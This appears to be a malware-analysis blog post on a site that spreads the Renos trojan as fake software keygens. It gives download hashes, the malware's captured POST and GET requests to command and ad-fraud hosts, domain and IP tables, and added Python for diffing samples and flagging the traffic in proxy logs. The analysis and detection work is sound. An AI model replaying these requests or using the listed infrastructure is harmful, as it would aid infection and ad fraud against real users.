Free download cracked software with surprise

We have logged another website that targets software-related search keywords and spreads the Renos trojan and other dangerous threats disguised as executable files of software cracks and keygens. The website uses blackhat SEO techniques to attract as many users as possible and to rank on the first pages of search engine results.

Cracked Software Website

The file that is downloaded from the dangerous website is:

Downloaded File

Report 2010-10-28 02:11:21 (GMT 1)
File Name keygen-youtubeget-v5-8-youtube
File Size 180224 bytes
File Type Executable File (EXE)
MD5 Hash 435c56e76544772ae273a324066df2cc
SHA1 Hash 2df1627a8e6dd607ac79b8ed4d3d32ebbadc4bf5
Detections: 2 / 16 (13 %)
Status INFECTED

Report 2010-10-28 02:11:44 (GMT 1)
File Name keygen-youtubeget-v5-8-youtube
File Size 180224 bytes
File Type Executable File (EXE)
MD5 Hash 80044a9b4867e9e45a465a5628de795f
SHA1 Hash 597ff8fd30eddd9b985fd26fff235277e585e81e
Detections: 2 / 16 (13 %)
Status INFECTED

Report 2010-10-28 02:15:17 (GMT 1)
File Name keygen-youtubeget-v5-8-youtube
File Size 180224 bytes
File Type Executable File (EXE)
MD5 Hash 798c460f8a7af4a54f863ff68fec064a
SHA1 Hash 78d20e58b107111ca552d65137a65335375bd012
Detections: 2 / 16 (13 %)
Status INFECTED

Report 2010-10-28 02:15:39 (GMT 1)
File Name keygen-youtubeget-v5-8-youtube
File Size 180224 bytes
File Type Executable File (EXE)
MD5 Hash 1ec2315af5929d0462fc9c5dd1e6aaf1
SHA1 Hash d72d642b5f4a6e11766b274f64d2263263fd58ee
Detections: 2 / 16 (13 %)
Status INFECTED

An interesting thing is that every time we downloaded the infected file, it had a different MD5 (and SHA-1) hash, while the file size stayed exactly the same (180224 bytes in all four reports above). Most probably the payload is generated on the fly on the server, or several executable variants of the malware are stored there and served at random. The likely purpose is to make sure the website always serves a fresh executable that hash-based blocklists and signature-based security software do not yet detect. A hash taken from a single download is therefore a weak indicator for this site; the download URL and the constant file size are more stable pivots.
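To tell "same build with a few bytes patched per download" apart from "genuinely different builds", the thing to check is which byte offsets actually differ between downloads of the same size. The following Python is an added example, not code from the original post; it embeds four constructed stand-in byte strings (not the real samples) that reproduce the observation above, identical size and different hashes, and reports the differing regions.

```python
"""Compare several downloads of the same URL and locate what differs.

Added example, not part of the original post. The four byte strings below
are constructed stand-ins, not the real samples: a fixed body plus a small
per-download region, mimicking "same size, different hash".
"""
import hashlib
from typing import Dict, List, Tuple


def fingerprint(data: bytes) -> Dict[str, object]:
    """Size, MD5 and SHA-1 of one download, as the page's reports list them."""
    return {
        "size": len(data),
        "md5": hashlib.md5(data).hexdigest(),
        "sha1": hashlib.sha1(data).hexdigest(),
    }


def differing_ranges(samples: List[bytes]) -> List[Tuple[int, int]]:
    """Return [start, end) byte ranges where at least two samples disagree.

    Only meaningful when all samples have the same length; raises otherwise.
    """
    sizes = {len(s) for s in samples}
    if len(sizes) != 1:
        raise ValueError(f"samples differ in size: {sorted(sizes)}")
    size = sizes.pop()
    ranges: List[Tuple[int, int]] = []
    start = None
    for i in range(size):
        if len({s[i] for s in samples}) > 1:   # column not constant
            if start is None:
                start = i
        elif start is not None:
            ranges.append((start, i))
            start = None
    if start is not None:
        ranges.append((start, size))
    return ranges


def classify(samples: List[bytes]) -> str:
    """Rough verdict on the kind of variation the server is producing."""
    if len({hashlib.md5(s).hexdigest() for s in samples}) == 1:
        return "identical"
    ranges = differing_ranges(samples)
    changed = sum(end - start for start, end in ranges)
    size = len(samples[0])
    if changed * 100 // size < 5:      # under 5 % of the file changes
        return f"same build, {changed} byte(s) patched in {len(ranges)} region(s)"
    return "substantially different builds"


# Constructed stand-ins: a fixed body followed by an 8-byte region that the
# (hypothetical) server stamps differently on every download.
_BODY = b"MZ" + b"\x00" * 60 + b"PE\x00\x00" + bytes(range(256)) * 4
_SAMPLES = [
    _BODY + b"seed0001" + b"\x00" * 8,
    _BODY + b"seed0002" + b"\x00" * 8,
    _BODY + b"seed0003" + b"\x00" * 8,
    _BODY + b"seedAAAA" + b"\x00" * 8,
]

if __name__ == "__main__":
    for s in _SAMPLES:
        print(fingerprint(s))
    print(differing_ranges(_SAMPLES))
    print(classify(_SAMPLES))
```

Run against real downloads, a small patched region points at server-side polymorphism (a per-download stamp or re-encoded stub), which in turn suggests that the unchanged parts of the file are the better place to derive a signature from.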

During the analysis, the following files have been created in our system:

Created Files

Suspicious DNS queries:

megadataonline .net
mydynatri .net
zoozus .com
threezio .com
sina.com .cn
waytoall .com
topdworld .com
thevehic .com
ad.tlvmedia .com

Network traffic:

POST /muchahos.php?ini=XXX HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: megadataonline .net
 
POST /logos/bd305e793bda3beeb28218754d729da6f334759cdd06b5446bb70c4cc2842087c284f404583eee08b/0485038023a/logo.gif HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: mydynatri .net
 
POST /werber/94653350334/217.gif HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: zoozus .com
 
POST /perce/fd103eb9fbba9bfe524268857d427d06236465cccda62504eb372cece2b4b0e7c2e4a4b4984ebef88/1475f360f30/qwerce.gif HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: threezio .com
 
POST /borders.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: waytoall .com
 
POST /1wave.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: topdworld .com
 
GET /2wave.php?Yfe6r8FPBg1YhglTLRtwQVy4qRTSmZv0YN/d HTTP/1.1
Referer: hxxp://ovguide .com/
Host: thevehic .com
 
GET /st?ad_type=iframe&ad_size=120x600&section=1447253 HTTP/1.1
Referer: hxxp://thevehic .com/2wave.php?Yfe6r8FPBg1YhglTLRtwQVy4qRTSmZv0YN/d
Host: ad.tlvmedia .com

The malware appears to POST a large amount of opaque, apparently encrypted data to several URLs, and at the end it receives instructions to visit some advertisement links. Two details stand out for detection: the POSTs carry a form-urlencoded body to paths that end in .gif (an image path should only be fetched with GET), and several path components are long hexadecimal strings. The Referer header on the GET to thevehic .com is set to ovguide .com, a site the infected machine never requested during the analysis, so that header is forged by the malware to make the ad request look like the result of a real visit.
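The three traits just described (POST to an image path, a long hex path segment, a Referer pointing at a host the client never visited) can be checked directly in a web proxy log. The Python below is an added example, not code from the original post; the tab-separated log format and the sample lines are constructed here, with only the hosts and paths taken from the requests shown above.

```python
"""Flag the ad-fraud traffic pattern above in a proxy log.

Added example, not from the original post. Log format (constructed):
timestamp, client, method, host, path, Content-Type, Referer, tab-separated,
with "-" for an absent header. Hosts and paths come from the page's capture;
timestamps and client addresses are made up.
"""
import re
from typing import Dict, List, Set
from urllib.parse import urlsplit

IMAGE_EXT = re.compile(r"\.(gif|jpe?g|png|bmp|ico)$", re.IGNORECASE)
LONG_HEX = re.compile(r"/[0-9a-f]{32,}(?:/|$)", re.IGNORECASE)
FORM = "application/x-www-form-urlencoded"

_ROWS = [
    ("2010-10-28T02:20:01", "10.0.0.5", "POST", "megadataonline.net", "/muchahos.php?ini=XXX", FORM, "-"),
    ("2010-10-28T02:20:02", "10.0.0.5", "POST", "mydynatri.net",
     "/logos/bd305e793bda3beeb28218754d729da6f334759cdd06b5446bb70c4cc2842087c284f404583eee08b/0485038023a/logo.gif", FORM, "-"),
    ("2010-10-28T02:20:03", "10.0.0.5", "POST", "zoozus.com", "/werber/94653350334/217.gif", FORM, "-"),
    ("2010-10-28T02:20:04", "10.0.0.5", "POST", "threezio.com",
     "/perce/fd103eb9fbba9bfe524268857d427d06236465cccda62504eb372cece2b4b0e7c2e4a4b4984ebef88/1475f360f30/qwerce.gif", FORM, "-"),
    ("2010-10-28T02:20:05", "10.0.0.5", "POST", "waytoall.com", "/borders.php", FORM, "-"),
    ("2010-10-28T02:20:06", "10.0.0.5", "GET", "thevehic.com",
     "/2wave.php?Yfe6r8FPBg1YhglTLRtwQVy4qRTSmZv0YN/d", "-", "http://ovguide.com/"),
    ("2010-10-28T02:20:07", "10.0.0.5", "GET", "ad.tlvmedia.com",
     "/st?ad_type=iframe&ad_size=120x600&section=1447253", "-",
     "http://thevehic.com/2wave.php?Yfe6r8FPBg1YhglTLRtwQVy4qRTSmZv0YN/d"),
    # Benign control: a normal image fetch with an on-site Referer.
    ("2010-10-28T02:21:00", "10.0.0.9", "GET", "example.org", "/images/logo.gif", "-", "http://example.org/"),
]
SAMPLE_LOG = "\n".join("\t".join(row) for row in _ROWS) + "\n"


def parse(line: str) -> Dict[str, str]:
    ts, client, method, host, path, ctype, referer = line.rstrip("\n").split("\t")
    return {"ts": ts, "client": client, "method": method, "host": host,
            "path": path, "ctype": ctype, "referer": referer}


def analyse(log_text: str) -> List[Dict[str, str]]:
    """Return one finding per (request, matching rule)."""
    findings: List[Dict[str, str]] = []
    seen_hosts: Dict[str, Set[str]] = {}   # client -> hosts it requested so far
    for line in log_text.splitlines():
        if not line.strip():
            continue
        r = parse(line)
        path_only = r["path"].split("?", 1)[0]
        if r["method"] == "POST" and IMAGE_EXT.search(path_only):
            findings.append({**r, "rule": "post-to-image-path"})
        if LONG_HEX.search(path_only):
            findings.append({**r, "rule": "long-hex-path-segment"})
        ref_host = urlsplit(r["referer"]).hostname if r["referer"] != "-" else None
        visited = seen_hosts.setdefault(r["client"], set())
        # A Referer naming a host this client has never fetched is not the
        # result of a real page visit; flag it as a likely forged header.
        if ref_host and ref_host != r["host"] and ref_host not in visited:
            findings.append({**r, "rule": "referer-host-never-visited"})
        visited.add(r["host"])
    return findings


if __name__ == "__main__":
    for f in analyse(SAMPLE_LOG):
        print(f["rule"], f["client"], f["method"], f["host"], f["path"][:40])
```

The Referer rule depends on seeing the whole session for a client, so it only works on an ordered per-client log (or a proxy that records the preceding requests), and it will misfire on the first request after a log rotation.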

Domain & IP Analysis:

Domain             IP               AS
sotapartners.net   174.123.211.138  AS21844
data-mortgage.com  78.46.76.170     AS24940
megadataonline.net 64.191.16.70     AS21788
mydynatri.net      77.78.248.84     AS42560
zoozus.com         85.234.190.47    AS6851
threezio.com       77.78.239.42     AS42560
waytoall.com       96.9.157.39      AS21788
topdworld.com      173.212.250.130  AS21788
thevehic.com       173.212.245.243  AS21788
ad.tlvmedia.com    217.163.21.37    AS42173

Other suspicious domains hosted in 64.191.16.70:

Domain              IP             AS
brodiero.com        64.191.16.70   AS21788
megadatacentral.net 64.191.16.70   AS21788
megadataonline.net  64.191.16.70   AS21788
spiderfile.net      87.255.51.229  AS38930

Other suspicious domains hosted in 85.234.190.47:

Domain            IP             AS
chattertune.net   85.234.190.47  AS6851
mybubblebean.com  (no A record)  n/a
roonotimex.com    85.234.190.47  AS6851